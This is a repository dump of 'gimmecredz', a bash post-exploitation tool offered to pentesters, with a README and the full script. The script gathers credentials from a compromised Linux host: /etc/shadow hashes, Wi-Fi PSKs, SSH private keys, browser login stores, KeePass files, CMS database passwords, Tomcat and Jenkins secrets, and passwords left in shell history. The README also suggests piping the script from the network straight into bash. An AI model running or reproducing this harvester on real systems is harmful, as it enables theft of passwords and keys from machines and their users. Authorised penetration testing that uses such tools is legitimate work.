├── README.md ├── gimmecredz.sh └── screenshot1.png /README.md: -------------------------------------------------------------------------------- 1 | You are a pentester, and you totally pwn that linux box (desktop, laptop, server, whatever). Now, what? You can read a lot of files, config files, history and so on in order to find something smelly. That could be time consuming, boring, or long. I decided to write a tool to automatize credentials picking on a pwned box. 2 | 3 | # Objective 4 | This tool can help pentesters to quickly dump all credz from known location, such as .bash_history, config files, wordpress credentials, and so on... 5 | This is not a hacking tool, just a collection of well-known files with password in them. 6 | The password can be in clear, base64 or enciphered form. It's up to the pentester to use them, decode them or change them. 7 | This tool can be launch by root or any users, it will autodetect file access and adapt accordingly. 8 | 9 | # Goals 10 | - this tool is in bash because bash is everywhere, and I wanted it to be the most compatible with all pwned systems without having to install any third party lib/shell/script language. 11 | - this tool should be easy to read/tweak and easy to add new password dumps 12 | - this tool should not be taken too seriously 13 | - this tool uses mainly bash with a little bit of grep (egrep), find and some other usual tools. 14 | - I don't care if this tool fails softly on one or another files. I prefer a simple tool with little fails than an heavier tool bloated with failchecks and sanity verification. 15 | - this tool should work quick, for this reason I don't want some hasardous find, such as: `find / -type f -exec grep password {} \;` find is limited with maxdepth 3 at most 16 | - this tool should be autodocumented. Read it. 17 | - this tool is not sponsored by the NSA and won't send your credz to any thirdparty. 18 | 19 | # Usage 20 | Easy usage: 21 | ```bash 22 | wget https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/master/gimmecredz.sh 23 | chmod +x gimmecredz.sh 24 | ./gimmecredz.sh 25 | ``` 26 | Or, for the l33t: 27 | ```bash 28 | $ curl https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/master/gimmecredz.sh | bash 29 | ``` 30 | Check the start of the script. You can set vars. Currently, you can force to check root-owned files even if you are user (in hope of misconfiguration of the targets). You can also put script in verbose where it show everything, even failures. 31 | 32 | # Future devs 33 | - adding more files, moar, moar!! The moar, the better! 34 | - adding the ability to save any found file. You launch script, you get a tarball with all of the juicy files in it. (see the TAR variable) 35 | 36 | # Screenshots (everybody loves screenshots!) 37 | ![Awesome tool](screenshot1.png) 38 | 39 | # Key extraction: 40 | Except for "root access", all files are check. If it's related to /home and if you're root, it will loop for all users. 41 | 42 | ## Root access 43 | - print inf if user have a shell in shadow file 44 | - WPA password store in wpa_supplicant or NetworkManager 45 | - grub password 46 | - ldap password 47 | - password in fstab 48 | - All other checks are done for root, and for 49 | 50 | ## Files with credz 51 | - .docker/config.json 52 | - mysql mycnf 53 | - pidgin (libpurple) 54 | - hexchat stored password to channels 55 | - postgresql 56 | - mysql and rdesktop pass stored in (z|ba)sh history 57 | - presence of a --password in (z|ba)sh history 58 | - ssh keys (protected by pass, and unprotected) 59 | - keepassx databases (ability to tell if it's currently open) 60 | 61 | ## Browsers 62 | - Firefox logins.json and key3.db 63 | - Chrome Login data 64 | 65 | ## Webapps 66 | - wordpress credz 67 | - drupal credz 68 | - Joomla! credz 69 | - tomcat credz (need testing, finding tomcat home is not exact science) 70 | 71 | ## More to come: 72 | I want to add databases, tomcat passwords, better .bash_history parsing, and any other file of interest which contains passwords and which can be accessed reliably. If you have any idea/improvement, share it. 73 | 74 | # FAQ 75 | ### You forgot to check this file or this directory 76 | Make a pull request, send me an email, ping me on twitter, I'll add it 77 | 78 | ### Can you change something here or here in the script? 79 | Make a pull request, send me an email, ping me on twitter, I'll add it 80 | 81 | ### Your tool fails to extract a password 82 | Make a pull request, send me an email, ping me on twitter, I'll add it (the more files, the better) 83 | 84 | ### I've found a bug! 85 | Make a pull request, send me an email, ping me on twitter, I'll add it 86 | 87 | ### I love you and I want to marry you 88 | Make a pull request, send me an^W^W^W Wait, WHAT? 89 | 90 | ### Does it have a license? 91 | BeerWare. If you're happy to use it, ping me :) 92 | 93 | ### There is no configure or make? 94 | Dude, this is pure bash 95 | 96 | ### Is it compatible with blockchain? 97 | LMAO!! Nope. 98 | 99 | ### No really? 100 | This is in my roadmap, I'll code it in v42.193.254-patchlevelGoldEdition-EditorFinalCut. Reservation needed, ICO in 3 months, It'll cost only 25k$ for you. 101 | 102 | ### But this look like Lazagne which is a tool designed to extract password? 103 | Yes. and [Lazagne](https://github.com/AlessandroZ/LaZagne) is a really great tool. Use it with my blessings. And [pupy](https://github.com/n1nj4sec/pupy/) too. I'm a happy user of both :) 104 | 105 | ### Does P=NP? 106 | I have a beautiful demonstration of this theorem, but it doesn't fit on ~~this margin~~. ~~this github~~. this internet. 107 | 108 | ### This is not secure code 109 | We are speaking of pwned system, so what? This is designed for pentesters, and they should know what they do. 110 | 111 | ### I've tested it and now, everybody have seen my password on the screen! 112 | Is your password hunter2? 113 | 114 | # Thanks 115 | thanks for [Hexpresso](https://twitter.com/HexpressoCTF) for inspirational IRC talk :) 116 | -------------------------------------------------------------------------------- /gimmecredz.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | # If there is a will, there is a way 3 | # 0xMitsurugi 4 | # v0.0.5 5 | 6 | ############## Credz dumper ############################## 7 | # This script will try to grab all stored password/secrets 8 | # on a linux box. 9 | 10 | # Defaults vars 11 | ROOT=0 #If set to 1, we'll try to get files usually owned by root 12 | #will produce errors, but could eventually get some things 13 | TAR=0 #should we copy and save files for later use 0: no, 1: yes 14 | #under planning 15 | VERBOSE=0 #should we print failed checks? 1 yes, 0 no 16 | 17 | ########################################################## 18 | # dumping functions 19 | 20 | _grep_file() { 21 | #if we are root, loop, else do it for current user only 22 | # $1 name of check 23 | # $2 file to check 24 | # $3 pattern to grep 25 | name="$1" 26 | file="$2" 27 | pattern="$3" 28 | ROOT=$(_check_root) 29 | if [ $ROOT == "yes" ]; then 30 | for userhome in $(grep -E "/bin/(ba|z)?sh" /etc/passwd | cut -d ":" -f6 ) 31 | do 32 | _grep_file_user "$name" "$userhome" "$file" "$pattern" 33 | done 34 | else 35 | _grep_file_user "$name" $HOME "$file" "$pattern" 36 | fi 37 | } 38 | 39 | _dump_wifi_wpa_supplicant() { 40 | #Check if there are some WPA password saved in wpa_supplicant.conf 41 | #First, find conf file, if there are many, try each of them 42 | #Second, extract password 43 | CONF_FILE='' 44 | #[ -r /etc/wpa_supplicant/wpa_supplicant.conf ] && _grep_file_user "WPA SUPPLICANT" "/etc/wpa_supplicant" "wpa_supplicant.conf" "-B6 password" 45 | for conffile in /etc/wpa_supplicant.d/*conf /etc/wpa_supplicant/*.conf /etc/wpa_supplicant.conf 46 | do 47 | _grep_file_user "WPA SUPPLICANT" "" "$conffile" "-B6 psk=" 48 | done 49 | 50 | 51 | } 52 | 53 | _dump_wifi_wpa_nm() { 54 | #Spits any saved psk with SSID 55 | #If directory doesn't exist, get out 56 | [ -d /etc/NetworkManager/system-connections/ ] || return 57 | unset DATA 58 | OLDIFS=$IFS 59 | IFS=$'\n' 60 | DATA=$(find /etc/NetworkManager/system-connections -type f ) 61 | if [ ${#DATA} -gt 1 ]; then 62 | for ssid in $DATA 63 | do 64 | if grep -q psk= $ssid; then 65 | _dump_name "WPA PSK saved in NetworkManager" 66 | _print_win "$ssid" "$(grep "psk=" "$ssid")" 67 | fi 68 | done 69 | else 70 | [ $VERBOSE -eq 1 ] && _dump_name "WPA PSK saved in NetworkManager" 71 | _print_lose "/etc/NetworkManager/system-connections/*" "No PSK saved nor files" 72 | fi 73 | IFS=$OLDIFS 74 | } 75 | 76 | _dump_grub() { 77 | #Sometimes, grub have a password 78 | if [ -r /etc/grub/grub.cfg ]; then 79 | #I'm reusing the _grep_file_user function because it's convenient 80 | _grep_file_user "GRUB password" "/etc/grub" "grub.cfg" "password" 81 | fi 82 | #Some distros use another scheme (debian) 83 | if [ -d /etc/grub.d/ ]; then 84 | #Sometimes password is in one of those multiples files 85 | _grep_file_user "GRUB password" "/etc/grub.d" "." "-r password" 86 | fi 87 | } 88 | 89 | _dump_ldap() { 90 | #Sometimes, a linux box is binded to an LDAP 91 | for secrets in libnss-ldap.secret ldap.secret pam_ldap.secret 92 | do 93 | if [ -r /etc/${secrets} ]; then 94 | _grep_file_user "LDAP password" "/etc" "${secrets}" "-v '^$'" 95 | fi 96 | done 97 | } 98 | 99 | _grep_file_user() { 100 | # $1 name 101 | # $2 home 102 | # $3 file 103 | # $4 pattern 104 | name=$1 105 | home=$2 106 | file=$3 107 | pattern=$4 108 | #Just in case: 109 | OLDIFS=$IFS 110 | IFS=$' \t\n' 111 | #_dump_name "$name credz [$home]" 112 | if [ -r ${home}/${file} ]; then 113 | grep -q $pattern ${home}/${file} 114 | SOMETHING=$? 115 | DATA=$(grep $pattern ${home}/${file}) 116 | if [ $SOMETHING -eq 1 ]; then 117 | echo -n "" 118 | else 119 | _dump_name "$name credz [$home]" 120 | _print_win "${home}/${file}" "$DATA" 121 | fi 122 | else 123 | [ $VERBOSE -eq 1 ] && _dump_name "$name credz [$home]" 124 | _print_lose "${home}/${file}" "no access to file" 125 | fi 126 | IFS=$OLDIFS 127 | } 128 | 129 | _dump_shadow() { 130 | #If we are root, dump shadow file 131 | #and start preheating of crackingStation-128CPU 132 | ROOT=$(_check_root) 133 | if [ $ROOT == "yes" ];then 134 | _dump_name "Interesting data in shadow file" 135 | DATA=$(egrep -v ":\*:|:\!\:" /etc/shadow) 136 | _print_win "/etc/shadow" "$DATA" 137 | fi 138 | } 139 | 140 | _dump_chrome_user() { 141 | #Try to locate file with login details 142 | #It should contains login in clear and pass in (clear? ciphered? Don't know) 143 | #$1 is home dir 144 | if [ -r $1/.config/google-chrome/Default/Login\ Data ]; then 145 | _dump_name "Google Chrome login details" 146 | _print_win "$1/.config/google-chrome/Default/Login\ Data" "Check this file, it may contains credz" 147 | fi 148 | } 149 | 150 | _dump_firefox_user() { 151 | #Try to find some logins.json files, might contain juicy info 152 | #We don't decrypt them, that's to [hard|long] in pure bash 153 | #if you want passwd, get them and use any programs which do the job 154 | # See : https://support.mozilla.org/fr/questions/1154032 or google "firefox decrypt password key3.db" 155 | #$1 is home dir 156 | home=$1 157 | #this regexp avoids the profiles.ini file 158 | for d in $1/.mozilla/firefox/????????.????* 159 | do 160 | if [ -r "$d"/key3.db -a -r "$d"/logins.json ]; then 161 | _dump_name "firefox logins.json and key3.db file" 162 | _print_win "$d/logins.json" "Check this file, it have credz inside" 163 | _print_win "$d/key3.db" "This file have the key to open logins.json" 164 | fi 165 | done 166 | } 167 | 168 | _loop_users() { 169 | #$1 is the name of the function 170 | if [ $(_check_root) == "yes" ]; then 171 | #We loop through user who have a shell bash, zsh or sh 172 | for userhome in $(grep -E "/bin/(ba|z)?sh" /etc/passwd | cut -d ":" -f6 ) 173 | do 174 | $1 "$userhome" 175 | done 176 | else 177 | $1 $HOME 178 | fi 179 | } 180 | 181 | _dump_ssh_keys() { 182 | #We need to find ssh keys, and unprotected ssh keys 183 | #$1 is home dir 184 | home=$1 185 | if [ -d $home/.ssh ]; then 186 | OLDIFS=$IFS 187 | IFS=$'\n' 188 | SSHKEYFILE=$(find $home/.ssh/ -type f) 189 | for f in $SSHKEYFILE 190 | do 191 | if grep -q "BEGIN RSA" $f; then 192 | if grep -q "ENCRYPTED" $f; then 193 | [ $VERBOSE -eq 1 ] && _dump_name "SSH Keys" 194 | _print_lose "$f" "ssh key protected with passphrase" 195 | else 196 | _dump_name "SSH Keys" 197 | _print_win "$f" "ssh key without protection" 198 | fi 199 | fi 200 | done 201 | IFS=$OLDIFS 202 | else 203 | _print_lose "$home" "No .ssh directory" 204 | fi 205 | 206 | } 207 | 208 | _dump_keepassx() { 209 | #We try to find keepass .kdb and .kdbx files 210 | #We use find command, and we fail fast (maxdepth=3) to avoid infinite directories 211 | #$1 is home dir 212 | home=$1 213 | OLDIFS=$IFS 214 | IFS=$'\n' 215 | KEEPASSX=$(find "$home" -maxdepth 3 -iname "*.kdb?") 216 | if [ ${#KEEPASSX} -gt 1 ]; then 217 | _dump_name "keepassx file" 218 | #What if we have space in names? 219 | for f in $KEEPASSX 220 | do 221 | if [ -f $(dirname ${f})"/."$(basename ${f})".lock" ]; then 222 | #If keepass is running, U can try to dump memory and search for master pw.. 223 | _print_win "$f" "Keepassx database open? (lock file found)" 224 | else 225 | _print_win "$f" "Keepassx database" 226 | fi 227 | done 228 | else 229 | [ $VERBOSE -eq 1 ] && _dump_name "keepassx file" 230 | _print_lose "$home" "No keepassx file found (no *.kdb?)" 231 | fi 232 | IFS=$OLDIFS 233 | } 234 | 235 | # _dump_webconf webconf cmsname 236 | _dump_webpass() { 237 | if [ "$1" == "Wordpress" ]; then 238 | GLOBALCREDZ=$(grep -B4 -A1 DB_PASSWORD $2) 239 | else 240 | if [ "$1" == "Drupal" ]; then 241 | GLOBALCREDZ=$(grep -E -v "\w*\*" $2 | grep -B4 -A1 "password' =>" ) 242 | else 243 | if [ "$1" == "Joomla!" ]; then 244 | GLOBALCREDZ=$(grep -A1 "\$user =" $2) 245 | fi 246 | fi 247 | fi 248 | } 249 | 250 | # _dump_webconf filename cmsname 251 | _dump_webconf() { 252 | #Webapps are a little weird. I don't make any assumptions such as userid 253 | #Let try with anybody, and if we find a file, let's rock 254 | #First, find WebRoot (apache? nginx? others?) 255 | #Second, find wp-config.php and grep it! 256 | 257 | # Verify Apache Web Server 258 | if [ -d /etc/apache2/sites-available/ ]; then 259 | for site in /etc/apache2/sites-available/* 260 | do 261 | #This regex avoids comments 262 | #Are we sure we have one and only one DocumentRoot in conf file? 263 | DOCROOT=$(grep 'DocumentRoot /' $site | grep -E -v "\w*#" | cut -d ' ' -f2) 264 | OLDIFS=$IFS 265 | IFS=$'\n' 266 | WEBCONF=$(find $DOCROOT -maxdepth 5 -name "$1*") 267 | if [ ${#WEBCONF} -gt 1 ]; then 268 | #Sometimes we have other credz in config file such as ftp? 269 | for webconf in $WEBCONF 270 | do 271 | _dump_webpass $2 $webconf 272 | CREDZ=$GLOBALCREDZ 273 | _dump_name "$2 config file" 274 | _print_win "$webconf" "$CREDZ" 275 | done 276 | else 277 | [ $VERBOSE -eq 1 ] && _dump_name "$1 config file" 278 | _print_lose "$DOCROOT" "No $2 $1 found" 279 | fi 280 | IFS=$OLDIFS 281 | done 282 | fi 283 | 284 | # Verify Nginx web server 285 | if [ -d /etc/nginx/sites-available/ ]; then 286 | for site in /etc/nginx/sites-available/* 287 | do 288 | #This regex avoids comments 289 | #Are we sure we have one and only one root in conf file? 290 | DOCROOT=$(egrep -i 'root /' $site | grep -E -v "\w*#" | sed -e 's/^.*root//' | cut -d ' ' -f 2 | tr -d ';') 291 | if [ -d $DOCROOT ]; then 292 | OLDIFS=$IFS 293 | IFS=$'\n' 294 | WEBCONF=$(find $DOCROOT -maxdepth 5 -name "$1*") 295 | 296 | if [ ${#WEBCONF} -gt 1 ]; then 297 | #Sometimes we have other credz in config file such as ftp? 298 | for webconf in $WEBCONF 299 | do 300 | _dump_webpass $2 $webconf 301 | CREDZ=$GLOBALCREDZ 302 | _dump_name "$2 config file" 303 | _print_win "$webconf" "$CREDZ" 304 | done 305 | else 306 | [ $VERBOSE -eq 1 ] && _dump_name "$2 config file" 307 | _print_lose "$DOCROOT" "No $2 $1 found" 308 | fi 309 | IFS=$OLDIFS 310 | fi 311 | done 312 | fi 313 | 314 | } 315 | 316 | _dump_tomcat() { 317 | #This is not easy because $CATALINA_HOME (or equivalent) could point 318 | #anywhere... and folders name conf/ are prone to false positive... 319 | # Sooo... at first try to imagine where your tomcat could be. 320 | #then grep file for passwords \o/ 321 | tomcatpath="/" 322 | for dir in /var/www /var/www/html /srv/www /opt /usr/local /srv 323 | do 324 | [ -d $dir ] && tomcatpath=$tomcatpath" $dir" 325 | done 326 | #now try to go one step lower 327 | for DIRS in $tomcatpath 328 | do 329 | OLDIFS=$IFS 330 | IFS=$'\n' 331 | tomcathome=$(find $DIRS -maxdepth 1 -type d) 332 | for tomcat in $tomcathome 333 | do 334 | if [ -r $tomcat/conf/server.xml ]; then 335 | _grep_file_user "ConnectionDB in tomcat" "$tomcat/conf" "server.xml" "-B 1 connectionURL" 336 | fi 337 | if [ -r $tomcat/conf/tomcat-users.xml ]; then 338 | _grep_file_user "tomcat users" "$tomcat/conf" "tomcat-users.xml" "password" 339 | fi 340 | done 341 | IFS=$OLDIFS 342 | done 343 | } 344 | 345 | _dump_jenkins() { 346 | for jenkinshome in "/home/jenkins/" "/var/lib/jenkins/" 347 | do 348 | if [[ -d $jenkinshome && -f "$jenkinshome/secrets/master.key" && -f "$jenkinshome/secrets/hudson.util.Secret" ]] 349 | then 350 | possible_secrets=$(grep -i "\|\|\|" "$jenkinshome/credentials.xml") 351 | if [ ${#possible_secrets} -gt 0 ] 352 | then 353 | _print_win "$jenkinshome/secrets/master.key" "Jenkins master key" 354 | _print_win "$jenkinshome/secrets/hudson.util.Secret" "Hudson secret" 355 | _print_win "$jenkinshome/credentials.xml" "$possible_secrets" 356 | _print_win " " "Check https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py in order to decrypt secrets" 357 | fi 358 | fi 359 | done 360 | } 361 | 362 | 363 | ########################################################## 364 | # internal functions 365 | RESTORE=$(echo -en '\033[0m') 366 | RED=$(echo -en '\033[00;31m') 367 | GREEN=$(echo -en '\033[00;32m') 368 | YELLOW=$(echo -en '\033[00;33m') 369 | BLUE=$(echo -en '\033[00;34m') 370 | MAGENTA=$(echo -en '\033[00;35m') 371 | PURPLE=$(echo -en '\033[00;35m') 372 | CYAN=$(echo -en '\033[00;36m') 373 | LIGHTGRAY=$(echo -en '\033[00;37m') 374 | LRED=$(echo -en '\033[01;31m') 375 | LGREEN=$(echo -en '\033[01;32m') 376 | LYELLOW=$(echo -en '\033[01;33m') 377 | LBLUE=$(echo -en '\033[01;34m') 378 | LMAGENTA=$(echo -en '\033[01;35m') 379 | LPURPLE=$(echo -en '\033[01;35m') 380 | LCYAN=$(echo -en '\033[01;36m') 381 | WHITE=$(echo -en '\033[01;37m') 382 | 383 | _banner () { 384 | echo ${RED}"#####################################################"${RESTORE} 385 | echo ${RED}"#"${RESTORE}" Gimme credz !!!" 386 | echo ${RED}"#####################################################"${RESTORE} 387 | #echo "One-file bash-only script" 388 | #echo "Harvest all known credz at once" 389 | #echo 390 | echo ${RED}"#"${RESTORE}" The name's 0xMitsurugi" 391 | echo ${RED}"#"${RESTORE}" Remember it!" 392 | echo ${RED}"#####################################################"${RESTORE} 393 | } 394 | 395 | _dump_name() { 396 | h=$(echo $1 | md5sum | cut -d " " -f1) 397 | echo 398 | echo ${GREEN}"***** "${RESTORE}${1}" "${GREEN}"***** "${RESTORE} 399 | #echo ${GREEN}"#################"${RESTORE} $1 ${GREEN}"###########################"${RESTORE} 400 | echo 401 | } 402 | 403 | _check_root() { 404 | if [ "$ROOT" == "1" ]; then 405 | #We pretend to be root to make checks 406 | echo "yes" 407 | else 408 | #otherwise, check for real 409 | if [[ $EUID -ne 0 ]]; then 410 | echo "no" 411 | else 412 | echo "yes" 413 | fi 414 | fi 415 | } 416 | 417 | _print_win() { 418 | #$1 : file containing secret 419 | #$2 : secret 420 | echo ${GREEN}"[+] GOT ONE!!"${RESTORE} 421 | if [ -x /usr/bin/realpath ]; then 422 | echo ${LBLUE}"File: "${RESTORE} $(realpath "$1") 423 | else 424 | echo ${LBLUE}"File: "${RESTORE} "$1" 425 | fi 426 | echo "$2" 427 | #This is the place to save file for a future use 428 | } 429 | 430 | _print_lose() { 431 | #$1 : file containing secret 432 | #$2 : lose message 433 | if [ $VERBOSE -eq 1 ]; then 434 | echo ${RED}"[ ] NOPE" 435 | echo ${LBLUE}"File: "${RESTORE} "$1" 436 | echo "$2" 437 | fi 438 | } 439 | 440 | _echo_error() { 441 | echo ${RED}"[!] Error"$RESTORE 442 | echo "$1" 443 | 444 | } 445 | 446 | _paragraph() { 447 | echo 448 | echo ${RED}"#################"${RESTORE} $1 ${RED}"###########################"${RESTORE} 449 | } 450 | 451 | ########################################################## 452 | # Main loop 453 | 454 | _banner 455 | #Are we saving everything? 456 | #if [ $TAR -eq 1 ]; then 457 | # if [ -d TAR/ ]; then 458 | # _echo_error "TAR/ exists. Disabling output" 459 | # TAR=0 460 | # else 461 | # mkdir TAR/ 462 | # fi 463 | #fi 464 | 465 | ###################### If we are root, then get kingdom keys 466 | # see the comment in _check_root if U want to try anyway those checks 467 | #Start dump!! 468 | if [ $(_check_root) == "yes" ]; then 469 | _paragraph "ROOT ACCESS!" 470 | _dump_shadow 471 | _dump_wifi_wpa_nm 472 | _dump_wifi_wpa_supplicant 473 | _dump_grub 474 | _dump_ldap 475 | _grep_file_user "Password in fstab" "/etc" "fstab" " -E [^<]pass" 476 | #Should we dump LUKS key? For what usage if we are in pentest? 477 | # in case you need it -> dmsetup table --showkeys crypto 478 | fi 479 | 480 | ###################### Have fun with credz stored in files 481 | _paragraph "FILES!" 482 | #Documentation: 483 | #_grep_file "Name of check" "Filepath (related to $HOME/) "grep pattern" 484 | _grep_file ".docker/config.json" ".docker/config.json" "-B1 auth\":" 485 | _grep_file "mysql_my_cnf" ".my.cnf" "-B1 password" 486 | _grep_file "pidgin (libpurple)" ".purple/accounts.xml" "-B1 password" 487 | _grep_file "hexchat passwords for servers" ".config/hexchat/servlist.conf" "-E -B1 C=" 488 | _grep_file "postgreSQL" ".pgpass" ":" 489 | _grep_file "mysql pass in CLI history" ".bash_history" "-E mysql.*-p" 490 | _grep_file "rdesktop pass in CLI history" ".bash_history" "-E rdesktop.*-p " 491 | _grep_file "password switch found in history" ".bash_history" "-- "--password"" 492 | _grep_file "mysql pass in CLI history" ".zsh_history" "-E mysql.*-p" 493 | _grep_file "rdesktop pass in CLI history" ".zsh_history" "-E rdesktop.*-p " 494 | #Always interesting to look there 495 | _loop_users _dump_ssh_keys 496 | #Keepass database are good targets 497 | _loop_users _dump_keepassx 498 | 499 | ######################### And now, browsers 500 | _paragraph "BROWSERS!" 501 | _loop_users _dump_firefox_user 502 | _loop_users _dump_chrome_user 503 | #old browsers? such as Konqueror? 504 | 505 | 506 | ############################# Play with webapps! 507 | #Find tomcat home, dump admin pass 508 | #How to find tomcat home reliably??? 509 | _paragraph "WEB APPS!" 510 | GLOBALCREDZ=0 511 | #_dump_wordpress 512 | #_dump_drupal 513 | _dump_webconf "wp-config.php" "Wordpress" 514 | _dump_webconf "settings.php" "Drupal" 515 | _dump_webconf "configuration.php" "Joomla!" 516 | _dump_tomcat 517 | _dump_jenkins 518 | #Add Directory Alias apache config? 519 | #if we found locatedb, should we use it? 520 | #.yml files (symphony) => credz config.yml or parameters.yml 521 | 522 | #Databases 523 | #find mysql file, postgresql file, etc.. -------------------------------------------------------------------------------- /screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/06316e6949168d591ff914604cdb01f1016b4b63/screenshot1.png --------------------------------------------------------------------------------